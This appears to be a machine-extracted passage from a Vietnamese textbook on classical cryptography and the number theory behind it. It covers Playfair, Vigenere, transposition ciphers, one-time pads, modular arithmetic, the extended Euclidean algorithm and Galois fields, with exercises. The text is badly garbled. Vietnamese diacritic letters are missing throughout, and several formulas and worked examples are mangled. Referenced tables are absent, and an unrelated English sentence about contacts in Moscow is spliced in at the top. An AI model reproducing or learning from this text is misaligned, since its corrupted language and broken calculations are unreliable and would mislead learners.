    - 20 direct contacts have been made with political representatives in moscow II.2.3 M Playfair Nh chng ta thy khng phi s kho ln trong m bng ch n m bo an ton m. Mt trong cc hng khc phc l m b cc ch, tc l mi ch s c m bng mt s ch khc nhau ty thuc vo cc ch m n ng cnh. Playfair l mt trong cc m nh vy, c sng to bi Charles Wheastone vo nm 1854 v mang tn ngi bn l Baron Playfair. y mi ch c th c m bng mt trong 7 ch khc nhau ty vo ch cp i cng n trong bn r. Ma trn kho Playfair. Cho trc mt t lm kho, vi iu kin trong t kho khng c ch ci no b lp. Ta lp ma trn Playfair l ma trn c 5 x 5 da trn t kho cho v gm cc ch trn bng ch ci, c sp xp theo th t nh sau: - Trc ht vit cc ch ca t kho vo cc hng ca ma trn bt t hng th nht. - Nu ma trn cn trng, vit cc ch khc trn bng ch ci cha c s dng vo cc cn li. C th vit theo mt trnh t qui c trc, chng hn t u bng ch ci cho n cui. - V c 26 ch ci ting Anh, nn thiu mt . Thng thung ta dn hai ch no vo mt chung, chng hn I v J. - Gi s s dng t kho MORNACHY. Lp ma trn kho Playfair tng ng nh sau: MONAR CHYBD EFGIK LPQST UVWXZ M ho v gii m: bn r c m ho 2 ch cng mt lc theo qui tc nh sau: - Chia bn r thnh tng cp ch. Nu mt cp no c hai ch nh nhau, th ta chn thm mt ch lc chng hn X. V d, trc khi m balloon bin i thnh ba lx lo on. - Nu c hai ch trong cp u ri vo cng mt hng, th m mi ch bng ch pha bn phi n trong cng hng ca ma trn kha (cun vng quanh t cui v u), chng hn ar bin i thnh RM - Nu c hai ch trong cp u ri vo cng mt ct, th m mi ch bng ch pha bn di n trong cng ct ca ma trn kha (cun vng quanh t cui v u), chng hn mu bin i thnh CM - Trong cc trng hp khc, mi ch trong cp c m bi ch cng hng vi n v cng ct vi ch cng cp vi n trong ma trn kha. Chng hn, hs m thnh BP, v ea m thnh IM hoc JM (tu theo s thch) An ton ca m Playfair: - An ton c nng cao so hn vi bng n, v ta c tng cng 26 x 26 = 676 cp. Mi ch c th c m bng 7 ch khc nhau, nn tn sut cc ch trn bn m khc tn sut ca cc ch ci trn vn bn ting Anh ni chung. - Mun s dng thng k tn sut, cn phi c bng tn sut ca 676 cp thm m (so vi 26 ca m bng n). Nh vy phi xem xt nhiu trng hp hn v

    - 21 tng ng s c th c nhiu bn m hn cn la chn. Do kh thm m hn m trn bng ch n. - M Playfair c s dng rng ri nhiu nm trong gii qun s M v Anh trong chin tranh th gii th 1. N c th b b kho nu cho trc vi trm ch, v bn m vn cn cha nhiu cu trc ca bn r. II.2.4 Cc m a bng Mt hng khc lm tng an ton cho m trn bng ch l s dng nhiu bng ch m. Ta s gi chng l cc m th a bng. y mi ch c th c m bng bt k ch no trong bn m ty thuc vo ng cnh khi m ho. Lm nh vy tri bng tn sut cc ch xut hin trong bn m. Do lm mt bt cu trc ca bn r c th hin trn bn m v lm cho thm m a bng kh hn. Ta s dng t kho ch r chn bng no c dng cho tng ch trong bn tin. S dng ln lt cc bng theo t kha v lp li t u sau khi kt thc t kho. di kho l chu k lp ca cc bng ch. di cng ln v nhiu ch khc nhau c s dng trong t kho th cng kh thm m. II.2.5 M Vigenere M th a bng n gin nht l m Vigenere. Thc cht qu trnh m ho Vigenere l vic tih hnh ng thi dng nhiu m Ceasar cng mt lc trn bn r vi nhiu kho khc nhau. Kho cho mi ch dng m ph thuc vo v tr ca ch trong bn r v c ly trong t kho theo th t tng ng. Gi s kho l mt ch c di d c vit dng K = K1K2Kd, trong Ki nhn gi tr nguyn t 0 n 25. Khi ta chia bn r thnh cc khi gm d ch. Mi ch th i trong khi ch nh dng bng ch th i vi tnh tin l Ki ging nh trong m Ceasar. Trn thc t khi m ta c th s dng ln lt cc bng ch v lp li t u sau d ch ca bn r. V c nhiu bng ch khac nhau, nn cng mt ch cc v tr khc nhau s c cc bc nhy khc nhau, lm cho tn sut cc ch trong bn m dn tng i u. Gii m n gin l qu trnh lm ngc li. Ngha l dng bn m v t kho vi cc bng ch tng ng, nhng vi mi ch s dng bc nhy lui li v u. V d: s dng m Vigenere vi t kha v bn r cho trc ta c th lm nh sau: - Vit bn r ra - Vit t kho lp nhiu ln pha trn tng ng ca n - S dng mi ch ca t kho nh kho ca m Ceasar - M ch tng ng ca bn r vi bc nhy tng ng. - Chng hn s dng t kho deceptive key: deceptivedeceptivedeceptive plaintext: wearediscoveredsaveyourself ciphertext:ZICVTWQNGRZGVTWAVZHCQYGL m ch w u tin ta tm ch u ca kha l d, nh vy w s c m trn bng ch tnh tin 3 (tc l a tnh tin vo d). Do ch u w c m bi ch Z. Ch th hai trong t kha l e, c ngha l ch th hai trong bn r s c tnh tin 4 (t a tnh tin n e). Nh vy th hai trong bn r e s c m bi ch I. Tng t nh vy cho n ht bn r.

    - 22 Trn thc t h tr m Vigenere, ngi ta to ra trang Saint Cyr tr gip cho vic m v gii m th cng. l mt bng c 26 x 26 c tn tng ng l cc ch ci trong bng ch ting Anh. Hng th i l tnh tin i ch ca bng ch ci. Khi ch ct u tin chnh l kho ca bng ch cng hng. Do ch m ca mt ch trong bn r nm trn cng ct vi ch v nm trn hng tng ng vi ch kho. ABCDEFGHIJKLMNOPQRSTUVWXYZ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z ABCDEFGHIJKLMNOPQRSTUVWXYZ BCDEFGHIJKLMNOPQRSTUVWXYZA CDEFGHIJKLMNOPQRSTUVWXYZAB DEFGHIJKLMNOPQRSTUVWXYZABC EFGHIJKLMNOPQRSTUVWXYZABCD FGHIJKLMNOPQRSTUVWXYZABCDE GHIJKLMNOPQRSTUVWXYZABCDEF HIJKLMNOPQRSTUVWXYZABCDEFG IJKLMNOPQRSTUVWXYZABCDEFGH JKLMNOPQRSTUVWXYZABCDEFGHI KLMNOPQRSTUVWXYZABCDEFGHIJ LMNOPQRSTUVWXYZABCDEFGHIJK MNOPQRSTUVWXYZABCDEFGHIJKL NOPQRSTUVWXYZABCDEFGHIJKLM OPQRSTUVWXYZABCDEFGHIJKLMN PQRSTUVWXYZABCDEFGHIJKLMNO QRSTUVWXYZABCDEFGHIJKLMNOP RSTUVWXYZABCDEFGHIJKLMNOPQ STUVWXYZABCDEFGHIJKLMNOPQR TUVWXYZABCDEFGHIJKLMNOPQRS UVWXYZABCDEFGHIJKLMNOPQRST VWXYZABCDEFGHIJKLMNOPQRSTU WXYZABCDEFGHIJKLMNOPQRSTUV XYZABCDEFGHIJKLMNOPQRSTUVW YZABCDEFGHIJKLMNOPQRSTUVWX ZABCDEFGHIJKLMNOPQRSTUVWXY Bng Saint Cyr An ton ca m Vigenere. Nh vy c ch m khc nhau cho cng mt ch ca bn r. Suy ra tn sut ca cc ch b l phng, ngha l tn sut xut hin cc ch trn bn m tng i u nhau. Tuy nhin cha mt hon ton, do di ca kho c hn, nn c th to nn chu k vng lp. K thm m bt u t tn sut ca ch xem c phi y l m n bng ch hay khng. Gi s y l m a bng ch, sau xc nh s bng ch trong t kho v ln tm tng ch. Nh vy cn tng di t kho tng s bng ch dng khi m l tn sut ca cc ch. II.2.6 Phng php thm m Kasiski

    - 23 Phng php pht trin bi Babbage v Kasiski. Ta thy cc ch nh nhau trn bn r v cch nhau mt khong ng bng di t kho (chu k), th s c m bng cng mt ch. Nh vy t lp ca cc ch trong bn m c th cho php xc nh chu k. Tt nhin khng phi khi no cng tm c di t kho. Sau tm cc ch trong t kho bng cch tn cng tng bng ch n vi cng k thut da trn cc bng tn sut ca cc b ch nh trc. II.2.7 M kho t ng L tng nht l ta c kho di nh bn tin. Do Vigenere xut kho t ng sinh cho bng di bn tin nh sau: t kho c ni tip bng chnh bn r to thnh kho. Sau dng m Vigenere m bn r cho. Khi bit t kho c th khi phc c mt s ch ban u ca bn r. Sau tip tc s dng chng gii m cho vn bn cn li. S ci tin ny lm mt khi nim chu k, gy kh khn cho vic thm m, nhng vn cn c trng tn sut tn cng. V d. Cho t kho deceptive. Ta vit bn r ni tip vo t kho to thnh t kho mi c di bng di bn r. key: deceptivewearediscoveredsav plaintext: wearediscoveredsaveyourself ciphertext:ZICVTWQNGKZEIIGASXSTSLVVWLA II.2.8 B m mt ln Nu kho thc s ngu nhin c dng v c di bng bn r th ta ni l b m mt ln. V n ch c dng mt ln v ngu nhin, nn m ho s an ton. M s khng b c v bn m khng c lin quan thng k g vi bn r, do b m c sinh ngu nhin. C th ni m b m mt ln l an ton tuyt i, v vi bn r bt k v bn m bt k, lun tn ti mt kho nh x bn r sang bn m cho. V mt l thuyt, xc sut mi mu tin (c cng di vi bn r) trn bng ch m l m ca mt bn r cho trc l nh nhau. Kho ch s dng mt ln, nn cc ln m l c lp vi nhau. Vn kh khn ca m b m mt ln l vic sinh ngu nhin kha v phn phi kho an ton. Do b m mt ln t c s dng v ch dng trong trng hp i hi bo mt rt cao. II.3 Cc m th c in hon v Trong cc mc trc chng ta xt mt s m thay th, cc ch ca bn r c thay th bng cc ch khc ca bn m. By gi chng ta xt n loi m khc, m hon v, cc ch trong bn r khng c thay th bng cc ch khc m ch thay i v tr, tc l vic m ho ch dch chuyn v tr tng i gia cc ch trong bn r. Nh vy, n du bn r bng cch thay i th t cc ch, n khng thay i cc ch thc t c dng. Do bn m c cng phn b tn sut xut hin cc ch nh bn gc. Nh vy c th thm m pht hin c. II.3.1 M Rail Fence y l m hon v n gin. Vit cc ch ca bn r theo ng cho trn mt s dng. Sau c cc ch theo theo tng dng s nhn c bn m. S dng chnh l kho ca

    - 24 m. V khi bit s dng ta s tnh c s ch trn mi dng v li vit bn m theo cc dng sau ly bn r bng cch vit li theo cc ct. V d. Vit bn tin meet me after the toga party ln lt trn hai dng nh sau m e m a t r h t g p r y e t e f e t e o a a t Sau ghp cc ch dng th nht vi cc ch dng th hai cho bn m: MEMATRHTGPRYETEFETEOAAT II.3.2 M dch chuyn dng M c s phc tp hn. Vit cc ch ca bn tin theo cc dng vi s ct xc nh. Sau thay i th t cc ct theo mt dy s kho cho truc, ri c li chng theo cc ct nhn c bn m. Qu trnh gii m c thc hin ngc li. V d: Key: 431 25 6 7 Plaintext: a t t a c k p o s t po n e d u n t i l t wo amxy z Ta c theo th t cc ct t 1 n 7 nhn c bn m: Ciphertext: TTNAAPTMTSUOAODWCOIXKNLYPETZ II.3.2 M tch M dng hon v hoc dch chuyn khng an ton v cc c trng tn xut ca ngn ng khng thay i. C th s dng mt s m lin tip nhau s lm cho m kh hn. M c in ch s dng mt trong hai phng php thay th hoc hon v. Ngi ta ngh n vic kt hp c hai phng php ny trong cng mt m v c th s dng an xen hoc lp nhiu vng. i khi ta tng lp nhiu ln cng mt loi m s to nn m phc tp hn, nhng trn thc t trong mt s trng hp v bn cht chng cng tng ng vi mt ln m cng loi no nh: tch ca hai php th s l mt php th; tch ca hai php hon v s l mt php hon v. Nhng nu hai loi m khc nhau th s to nn m mi phc tp hn, chnh v vy php th c ni tip bng php dch chuyn s to nn m mi kh hn rt nhiu. y chnh l chic cu ni t m c in sang m hin i. im yu ca m c in: - Phng php m ho c in c th d dng b gii m bng cch on ch da trn phng php thng k tn xut xut hin cc ch ci trn m v so snh vi bng thng k quan st ca bn r. - dng c m ho c in th bn m ho v bn gii m phi thng nht vi nhau v c ch m ho cng nh gii m. Nu khng th hai bn s khng th lm vic c vi nhau. II.4 Mt s vn khc. II.4.1 My quay Trc khi c m hin i, my quay l m tch thng dng nht. Chng c s dng rng ri trong chin tranh th gii th hai: c, ng minh v Nht. My quay to nn

    - 25 m thay th rt a dng v phc tp. Trong my c s dng mt s li hnh tr, mi li ng vi mt php th, khi quay s thay th mi ch bng mt ch khc tng ng. Vi 3 hnh tr khc nhau, ta c 26 x 26 x 26 = 17576 bng ch. II.4.2 Du tin Mt trong nhng k thut khc m bo tnh bo mt ca thng tin c gi l du tin. y l mt s la chn dng kt hp hoc ng thi vi m. Du tin l du s tn ti ca bn tin cn bo mt trong mt thng tin khc nh: trong bn tin di ch dng mt tp con cc ch/t c nh du bng cch no ; s dng mc khng nhn thy; du tin trong cc file m thanh hoc hnh nh. Cc k thut ny gn y cng c quan tm nghin cu. Tuy nhin n c nhc im l ch du c lng thng tin nh cc bt.

    - 26 Bi tp 1. Cho bin an m sau dng m Cesar "GCUA VQ DTGCM" Suy lun tm bn r. 2. S dng k thut thm m bng ch n, lp bng tn sut cc ch, b ch i, b ch ba ca an m sau: UZQSOVUOHXMOPVGPOZPEVSGZWSZOPFPESXUDBMETSXAIVUEPHZH MDZSHZOWSFPAPPDTSVPQUZWYMXUZUHSXEPYEPOPDZSZUFPOUDTM OHMQ Lp lun v cho bit nh x ca bng ch n v a ra bn r ph hp 3. Nu thut ton dng bng Saint Cyr m ha v gii m Vigenere khi bit t kha. p dng thut ton m ha bn r sau: Network Security is very important for software development vi t kha l COMPUTER SCIENCE 4. Ti sao c th ni C th ni m b m mt ln l an ton tuyt i, v vi bn r bt k v bn m bt k, lun tn ti mt kho nh x bn r sang bn m cho. Gii thch nhn nh sau V mt l thuyt, xc sut mi mu tin (c cng di vi bn r) trn bng ch m l m ca mt bn r cho trc l nh nhau. 5. Tm bn m ca bn r We are studying cryptography this year s dng m Playfair vi t kha information technology. 6. Chng t rng, php dch chuyn khng khc phc c tnh d tha ca ngn ng t nhin. 7. Chng minh rng tch ca hai php th n l mt php th n v tch ca hai php dch chuyn l mt php dch chuyn. C th ni g v tch ca mt php th n v mt php dch chuyn. 8. C bao nhiu kha Playfair khc nhau. 9. M ha bn r Chung toi se la nhung ky su cong nghe thong tin gioi trong mot vai nam nua s dng t kha 631425. 10. Gi s dng m dch chuyn dng vi 8 ct. Hi c bao nhiu kha khc nhau. Nu thut ton gii m vi t kha cho trc. 11. Chng minh rng: tch ca hai php th s l mt php th; tch ca hai php hon v s l mt php hon v.

    - 27 CHNG 3: TRNG HU HN M u Gii thiu v cu trc i s - trng hu hn. y l m hnh ton hc ng vai tr quan trng trong l thuyt m nh i vi chun m nng cao AES, m ng cong Elip, m IDEA v kho cng khai. N lin quan n cc php ton trn s: y s xt s l khi nim khi qut hn cc s nguyn, s thc, s phc thng gp trong s hc, ni chung s c th l cc phn t trong mt tp hp no . ng thi trn tp hp c trang b cc php ton tng ng tho mn mt s tnh cht nht nh nh cc s vi cc php ton cng, tr hoc nhn, chia. Ta bt u t cc khi nim v nhm, vnh, trng ca i s tru tng. III.1 Cc cu trc i s III.1.1 Nhm Cho mt tp cc phn t hoc s v mt php ton hai ngi, m kt qu cng l mt phn t ca tp hp . Tc l ng vi mi cp phn t trn tp , kt qu ca php ton cng l mt phn t xc nh ca tp cho. Tnh cht ny ta gi l tnh ng ca php ton trn tp ang xt. nh ngha nhm. Tp hp G vi php ton . cho c gi l nhm, nu n tha mn cc tnh cht sau vi mi phn t a, b, c thuc G: o Tnh kt hp (a.b).c = a.(b.c) o C n v e: e.a = a.e = a o C nghch o a-1: a.a-1 = e Nu c thm tnh giao hon a.b = b.a, th gi l nhm Aben hay nhm giao hon. nh ngha nhm xiclic. o nh ngha ly tha nh l vic p dng lp php ton: V d: a3 = a.a.a o V n v e=a0 o Mt nhm c gi l xiclic nu mi phn t u l ly tha ca mt phn t c nh no . Chng hn b = ak i vi a c nh v mi b trong nhm. o Khi a c gi l phn t sinh ca nhm. III.1.2 Vnh Cho mt tp R cc s vi hai php ton c gi l cng v nhn. y s c hiu l phn t ca tp hp v hai php ton trn xc nh trn tp hp . Tp vi hai php ton trn c gi l vnh, nu hai php ton tho mn cc tnh cht sau o Vi php cng, R l nhm Aben o Vi php nhn, c tnh ng v tnh kt hp tnh phn phi i vi php cng a(b+c) = ab + ac

    - 28 Nu php nhn c tnh giao hon th to thnh vnh giao hon. Nu php nhn c nghch o v khng c thng 0 (tc l khng c hai phn khc 0 m tch ca chng li bng 0), th n to thnh min nguyn III.1.3 Trng l mt tp hp F vi hai php ton cng v nhn, tho mn tnh cht sau: o Vi php cng F l nhm Aben o Vi php nhn F tr phn t 0 l nhm Aben. o F l mt vnh C th ni l c cc php ton cng, tr, nhn, chia s khc 0. Php tr c coi nh l cng vi s i ca php cng v php chia l nhn vi s i ca php nhn: a b = a + (-b) a / b = a.b-1 V d: D dng thy, vi php cng v nhn thng thng: o Tp s nguyn Z l nhm Aben vi php cng o Tp s nguyn Z l vnh giao hon. o Tp s hu t Q l trng. o Tp s thc R l trng. o Tp s phc C l trng vi php cng v nhn hai s phc. III.2 S hc trn Modulo IV.2.1 nh ngha Modulo. Cho s t nhin n v s nguyn a. Ta nh ngha: a mod n l phn d dng khi chia a cho n. nh ngha quan h tng ng trn tp s nguyn a b mod n khi v ch khi a v b c phn d nh nhau khi chia cho n. o V d: 100 mod 11 = 1; 34 mod 11 = 1, nn 100 34 mod 11 o S b c gi l i din ca a, nu a b mod n (a = qn + b) v 0 <= b < n. o V d: -12 mod 7 -5 mod 7 2 mod 7 9 mod 7. y 2 l i din ca 12, -5, 2 v 9. o Trong Modulo 7 ta c cc lp tung ng vit trn cc hng nh sau: ... -21 -20 -19 -18 -17 -16 -15 -14 -13 -12 -11 -10 -9 -8 -7 -6 -5 -4 -3 -2 -1 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 ...

    - 29 Cc phn t cng ct l c quan h ng d vi nhau. Tp cc i din ca cc s nguyn theo Modulo n gm n phn t k hiu nh sau: Zn = { 0, 1, 2, 3, , n-1 }. c s o S b khng m c gi l c s ca a, nu c s m sao cho: trong a, b, m u nguyn. o Tc l a chia ht cho b, k hiu l b|a o V d: 1, 2, 3, 4, 6, 8, 12, 24 l cc c s ca 24 III.2.2 Cc php ton s hc trn Modulo Cho trc mt s n. Ta mun thc hin cc php ton theo Modulo ca n. Ta c th thc hin cc php ton trn cc s nguyn nh cc php cng, nhn cc s nguyn thng thng sau rt gn li bng php ly Modulo hoc cng c th va tnh ton, kt hp vi rt gn ti bt c thi im no: (a+b) mod n = [a mod n + b mod n] mod n (*) (a.b) mod n = [a mod n . b mod n] mod n (**) Nh vy khi thc hin cc php ton ta c th thay cc s bng cc s tng ng theo Modulo n hoc n gin hn c th thc hin cc php ton trn cc i din ca n: Zn = { 0, 1, 2, 3, , n-1 }. o Zn vi cc php ton theo Modulo to thnh vnh giao hon c n v. Thc vy tnh ng ca cc php cng v nhn da trn hai cng thc (*) v (**). Cc tnh cht kt hp, giao hon v nghch o c suy ra t cc tnh cht tng ng ca cc s nguyn. o Cc ch v tnh cht rt gn: nu (a+b)(a+c) mod n, th bc mod n Nhng (ab)(ac) mod n, th bc mod n ch khi nu a l nguyn t cng nhau vi n V d. p dng cc tnh cht ca modulo: 17 (11*19 + 10 ) mod 7 = 17 ((11*19) mod 7 + 10 mod 7) mod 7 = 17 ((11 mod 7* 19 mod 7) mod 7 + (10 mod 7) mod 7) mod 7= 2222 ((4.(-2)) mod 7 + (((3 ) ) ) * 3 mod 7)mod 7= 222 ((-1) mod 7 + ((2 ) ) * 3 mod 7)mod 7 = (-1 + 5) mod 7 = 4 V d: Bng Modulo 8 vi php cng a = mb

    - 30 -

    III.2.3 c s chung ln nht. Bi ton. Cho hai s nguyn dng a v b. Bi ton tm c chung ln nht ca hai s nguyn dng l bi ton chung ca l thuyt s. Ta k hiu GCD(a,b) l c s chung dng ln nht ca a v b, tc l s nguyn dng va l c ca a va l c ca b v l s nguyn dng ln nht c tnh cht . V d: GCD(60,24) = 12 ; GCD (6, 15) = 3; GCD(8, 21) = 1. Nguyn t cng nhau. Ta thy 1 bao gi cng l c s chung ca hai s nguyn dng bt k. Nu GCD(a, b) = 1, th a, b c gi l hai s nguyn t cng nhau: V d: GCD(8,15) = 1, tc l 8 v 15 l hai s nguyn t cng nhau

    Tm c chung ln nht. By gi chng ta xt bi ton tm c s chung ln nht ca hai s nguyn dng cho trc. D dng chng minh c tnh cht sau: GCD(a,b) = GCD(b, a mod b) Nh vy tm c s chung ca mt cp s cho trc, ta a v bi ton tm c chung ca cp s gm s nh hn trong hai s v phn d ca s ln khi chia cho s nh hn. Thut ton clt to nn vng lp, mi bc ta p dng tnh cht trn cho n khi phn d cn khc 0. Thut ton clit tm GCD(a, b) A=a, B=b while B>0R = A mod B A = B, B = R return A V d: GCD(1970,1066) 1970 = 1 x 1066 + 904 1066 = 1 x 904 + 162 904 = 5 x 162 + 94 gcd(1066, 904) gcd(904, 162) gcd(162, 94)

    - 31 162 = 1 x 94 = 1 x 68 = 2 x 26 = 1 x 16 = 1 x 10 = 1 x 6 = 1 x 4 = 2 x gcd(1970, 94 + 68 68 + 26 26 + 16 16 + 10 10 + 6 6 + 4 4 + 2 2 + 0 1066) = 2 gcd(94, 68) gcd(68, 26) gcd(26, 16) gcd(16, 10) gcd(10, 6) gcd(6, 4) gcd(4, 2)

    III.3 Trng Galoa Ta mun i tm mt trng s c hu hn cc phn t, tc l mt tp hu hn cc phn t m c th cng tr, nhn, chia m khng vt ra ngoi phm vi tp hu hn cc phn t . Trng Galoa thuc lai v ng vai tr quan trng trong l thuyt m. C th chng minh c rng s cc phn t ca trng hu hn bt k bng ly tha ca pm ca s nguyn t p no , ta k hiu trng Galoa l GL(pm). Thng thng ta s dng cc trng: GL(p) v GL(2m). Sau y chng ta s xy dng cc trng Galoa . III.3.1 Trng Galoa GL(p), vi p l s nguyn t. o GL(p) gm tp {0,1, , p-1} o Vi cc php ton cng v nhn Modulo, nh ta bit GL(p) to thnh mt vnh giao hon. V p l s nguyn t nn mi s khc 0 nh hn p u nguyn t cng nhau vi p. GL(p) to thnh trng v mi a thuc {1, , p-1} u c phn t nghch o a1 : a . a-1 = 1. Thc vy v a v p nguyn t cng nhau nn theo thut ton tm nghch o di y ta s tm c nghch o ca a. Nh vy trn GL(p) ta c th thc hin cc php ton cng, tr, nhn, chia. V d php nhn trn GL(7)

    - 32 III.3.2 Tm s nghch o By gi ta xt bi ton: nu GCD(m, b) = 1, th tm nghch o ca b theo Modulo m. Ta m rng thut ton clit va tm c chung ln nht ca m v b, va tnh nghch o trong trng hp GCD(m, b) = 1. Thut ton Euclid m rng: EXTENDED EUCLID(m, b) 1.(A1, A2, A3)=(1, 0, m); (B1, B2, B3)=(0, 1, b) 2. if B3 = 0 return A3 = gcd(m, b); no inverse 3. if B3 = 1 return B3 = gcd(m, b); B2 = b1 mod m 4. Q = A3 div B3 5. (T1,T2,T3)=(A1 Q*B1,A2 Q*B2, A3 Q*B3) 6. (A1, A2, A3)=(B1, B2, B3) 7. (B1, B2, B3)=(T1, T2, T3) 8. goto 2 Thc vy, cc quan h sau l bt bin: mA1 + bA2 = A3; (1) mB1+ bB2 = B3 mT1 + bT2 = T3; (2) (3)

    V ban u: m.1 + b.0 = m; m.0 +b.1 = b, nn ta c (1) v (2) ng. V ta chng minh trong mt bc lp t (1) v (2) suy ra (3). T thut ton ta c : T1 = A1 Q.B1 T2 = A2 Q.B2 T3 = A3 Q.B3 Nn ta s chng minh ng thc (3) cn li mT1 + bT2 = m(A1 Q.B1) + b (A2 Q.B2) = (mA1 + bA2) - Q(mB1+ bB2) = A3 Q.B3 = T3 Khi sang bc lp tip theo i vai tr B sang A v T sang B, th cc cng thc i (1) v (2) i vi A, B s ng, v do theo chng minh trn (3) s ng trong bc lp tip theo. Vy (1), (2), (3) l cc bt bin ca vng lp. Cui cng khi B3 = 1, th t cc bt bin ta c: mB1+ bB2 = 1 bB2 = 1- mB1 bB2 = 1 mod m Do : B2 = b-1 mod m V d. Tm nghch o ca 550 trong GL(1759).

    - 33 Mi bc thc hin thut ton clit m rng s c m t bi mt hng trong bng sau.

    Sau 4 bc. ta c B3 = 1, khi thut ton dng, GCD(1759, 550) = 1 v 550-1 mod 1759 = 355. III.3.3 S hc a thc Ta xt tp cc a thc Pn c bc nh hn hoc bng n:

    Trn tp cc a thc ta c th c mt s cch khc nhau thc hin cc php ton cng v nhn a thc: o C th thc hin cc php ton thng thng trn a thc o Cc php ton trn a thc vi cc h s trn Modulo p o Cc php ton trn a thc vi cc h s trn Modulo p v sau ly Modulo theo a thc m(x) Php ton a thc thng thng o Cng tr cc h s tng ng o Nhn mi h s vi cng mt s. V d. f(x) = x3 + x2 + 2 v g(x) = x2 x + 1 f(x) + g(x) = x3 + 2x2 x + 3 f(x) g(x) = x3 + x + 1 f(x) . g(x) = x5 + 3x2 2x + 2 Php ton a thc vi Modulo h s o Cho s nguyn t p ty o Tnh cc h s theo Modulo p. Khi tp cc h s c ly t trng GL(p). Cn php nhn a thc c th nhn c kt qu l a thc bc ln hn n. o Ta thng quan tm n Mod 2, tc l mi h s l 0 hoc 1 Gi s f(x) = x3 + x2 and g(x) = x2 + x + 1 f(x) + g(x) = x3 + x + 1

    - 34 f(x) . g(x) = x5 + x2 Sau y ta xt ring trng hp khi cc php tan cng, nhn a thc c thc hin vi php ly Modulo theo mt a thc no . III.3.4 Php ton a thc vi Modulo a thc Cho a thc g(x) bc n v cc h s ca cc a thc xt trong mc ny ly trong trng Galoa GF(p) vi p l s nguyn t. Vit a thc f(x) di dng: f(x) = q(x) g(x) + r(x) trong r(x) l phn d khi chia f(x) cho g(x). R rng bc ca r(x) s nh hn bc ca g(x). Ta vit r(x) = f(x) mod g(x) Nu khng c phn d, tc l r(x) = 0, ta ni g(x) l c ca f(x) hay g(x) chia ht f(x) hay f(x) chia ht cho g(x). Trong trng hp g(x) khng c c ngoi 1 v chnh n, th ta ni g(x) l a thc nguyn t hoc khng rt gn c. V d g(x) = x3 + x + 1 l a thc nguyn t. Vic tm c chung ln nht ca hai a thc c trnh by trong thut ton tng t nh colit nh sau: Tm a thc c chung ln nht GCD(a(x), b(x)) o c(x) = GCD(a(x), b(x)) nu c(x) l a thc bc ln nht m chia ht c a(x), b(x) o C th iu chnh thut ton Euclids Algorithm tm n: EUCLID[a(x), b(x)] 1. A(x) = a(x); B(x) = b(x) 2. if B(x) = 0 return A(x) = gcd[a(x), b(x)] 3. R(x) = A(x) mod B(x) 4. A(x) B(x) 5. B(x) R(x) 6. goto 2 Thut ton tm nghch o ca mt a thc theo mt a thc nguyn t cng nhau vi n, c trnh by tng t nh colit m rng. Php ton a thc vi Modulo a thc. Cho g(x) l a thc nguyn t bc n. Khi tp cc a thc bc nh hn bng n vi cc php ton cng v nhn a thc theo Modulo ca a thc nguyn t g(x) to thnh trng hu hn, gi l trng Galoa v k hiu l GL(pn). Sau y ta xt trng GF(2n), tc l xt tp cc a thc vi cc h s Modulo 2 v bc nh hn bng n v php ton nhn c th rt gn theo Modulo ca a thc g(x) nguyn t bc n. C th tm c nghch o nh thut ton Euclide m rng. Tuy nhin thun tin trong vic biu din a thc, ta s xy dng song nh t tp cc a thc bc nh hn n vo cc dy n bit l dy cc h s th hin s c mt ca cc ly tha tng ng, v xy dng cc php ton cng v nhn cc dy bit sao cho nhn c kt qu tng t nh cng v nhn cc a thc tng ng cng vi vic rt gn theo a thc nguyn t. n gin ta minh ha qua v d c th trn GL(23). V d GF(23)

    - 35 -

    Bng trn c th xy dng bng cch tnh trc tip trn cc php ton cng v nhn a thc sau ly Modulo theo a thc nguyn t x3 + x + 1. Tuy nhin c th thc hin cc php ton trn dy 3 bit nh sau; o V cc h s l 0, 1 nn cc a thc c th biu din nh cc xu bit o Php cng hai a thc tr thnh XOR (cng c s 2) trn cc xu bit tng ng vi hai a thc . o Nhn mt a thc vi x tr thnh Shift sang tri 1 n v ca dy . bit tng ng vi a thc . o Php tnh Modulo theo a thc nguyn t ca mt a thc cng bc n c thc hin bng cch tnh hiu hay cng l tng ca hai a thc , m cng chnh l ly dy bit ca a thc XOR vi dy bit ca a thc nguyn t. o Php nhn v tnh Modulo c kt hp bng php lp gia Sht v XOR.

    V d. Trong GF(23) ta c (x2+1) tng ng dy bt 1012 v (x2+x+1) tng ng vi dy 1112 Tng hai a thc trn l (x2+1) + (x2+x+1) = x 101 XOR 111 = 0102 Tch ca hai a thc l (x+1).(x2+1) = x.(x2+1) + 1.(x2+1) = x3+x+x2+1 = x3+x2+x+1 011.101 = (101)<<1 XOR (101)<<0 = 1010 XOR 101 = 11112 Php rt gn theo Modulo l

    - 36 (x3+x2+x+1 ) mod (x3+x+1) = (x3+x2+x+1 ) - (x3+x+1 ) = x2 1111 mod 1011 = 1111 XOR 1011 = 01002 Nh vy trng Galoa GL(2n) bao gm 2n phn t. Mun trng Galoa c s phn t ln tu , ta ch vic tng v ly n thch hp. c bit vic tnh ton cc php ton cng tr, nhn, chia trn rt nhanh v hiu qu trn cc thao tc ca cc thit b phn cng. Chnh v vy trng Galoa ng vai tr quan trng trong l thuyt m m chng ta s thy r qua cc chng tip theo. III.4 Gii thiu l thuyt s III.4.1 Cc s nguyn t Nh chng ta bit s nguyn t l cc s nguyn dng ch c c s l 1 v chnh n. Chng khng th c vit di dng tch ca cc s khc. 1 l s nguyn t, nhng khng quan tm n n. Xt cc s nh hn 10 ta c: 2, 3, 5, 7 l s nguyn t, v chng khng c c s khc 1 v chnh n; 4, 6, 8, 9, 10 khng phi l s nguyn t. C th ni 2 l s chn duy nht l s nguyn t. Cc s nguyn t l trung tm ca l thuyt s. S cc s nguyn t l v hn. V d. Sau y l danh sch cc s nguyn t nh hn 200: 2 3 5 7 11 13 17 19 23 29 31 37 41 43 47 53 59 61 67 71 73 79 83 89 97 101 103 107 109 113 127 131 137 139 149 151 157 163 167 173 179 181 191 193 197 199 III.4.2 Phn tch ra tha s nguyn t Mt trong nhng bi ton c bn ca s hc l phn tch ra tha s nguyn t s a, tc l vit n di dng tch ca cc s nguyn t. Lu rng phn tch l bi ton kh hn rt nhiu so vi bi ton nhn cc s nhn c tch. Ta c kt lun, mi s nguyn dng u c phn tch duy nht thnh tch cc ly tha ca cc s nguyn t:

